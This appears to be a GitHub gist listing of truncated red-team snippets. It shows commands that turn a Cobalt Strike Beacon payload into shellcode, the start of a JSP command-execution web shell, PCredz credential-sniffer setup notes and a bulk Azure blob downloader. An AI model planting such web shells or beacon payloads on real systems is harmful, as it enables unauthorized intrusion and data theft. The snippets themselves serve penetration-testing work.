0xhexmex
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Take a stageless CS Beacon raw payload and convert to shellcode in the '\xAA\xBB...' format | |
| # Attacks > Packages > Windows Executable (S) > Raw. Save as beacon.bin | |
| # hexdump -v -e '"\\x" 1/1 "%02X"' ./beacon.bin | |
| // Take any raw shellcode file and get the hex from it in the 'fe9820fa...' format | |
| # xxd -p -c 100000000000000000 ./payload.bin |
0xhexmex
/ cmd.jsp
Created
September 8, 2020 00:50
— forked from ErosLever/cmd.jsp
A simple and minimal yet effective JSP Web Shell that escapes command output as HTML entities as needed.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <form method="GET" action=""> | |
| <input type="text" name="cmd" /> | |
| <input type="submit" value="Exec!" /> | |
| </form> <%! | |
| public String esc(String str){ | |
| StringBuffer sb = new StringBuffer(); | |
| for(char c : str.toCharArray()) | |
| if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) | |
| sb.append( c ); | |
| else |
0xhexmex
/ fixterm.sh
Last active
April 21, 2022 21:03
Remove zsh auto-suggestions and syntax highlighting from AWS Kali AMI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/zsh | |
| # Turn off auto suggestions | |
| rm /usr/share/zsh-autosuggestions/zsh-autosuggestions.zsh | |
| # Turn off syntax highlighting | |
| rm /usr/share/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh | |
| # Reload terminal |
0xhexmex
/ pcredz_howto.txt
Created
August 17, 2022 01:49
How to get PCredz working - might be related to having python3.10
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Install pipx (only needed to install pipenv) | |
| # python3 -m pip install --user pipx | |
| # python3 -m pipx ensurepath | |
| Install pipenv for python3.10 | |
| # apt install python3.10-venv | |
| # pipx install pipenv | |
| Clone PCredz, create pipenv in it, then clone python-libpcap and install it | |
| ┌──(root㉿kali)-[~] |
0xhexmex
/ download_azure_blobs.ps1
Last active
August 17, 2022 18:35
— forked from Dillie-O/get_all_media.ps1
PowerShell script to iterate all containers and blobs in a storage account and download it. - forked to use Az module instead of Azure, and storage account name instead of connection string
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Usage: Install-Module Az > Import-Module Az > Connect-AzAccount > Get-AzStorageAccount > replace the $storage_account variable in the script > run the script | |
| $destination_path = '.' | |
| # $connection_string = '[AZURE_STORAGE_CONNECTION_STRING]' | |
| $storage_account = '' | |
| $storage_account = New-AzStorageContext -StorageAccountName $storage_account | |
| $containers = Get-AzStorageContainer -Context $storage_account |
OlderNewer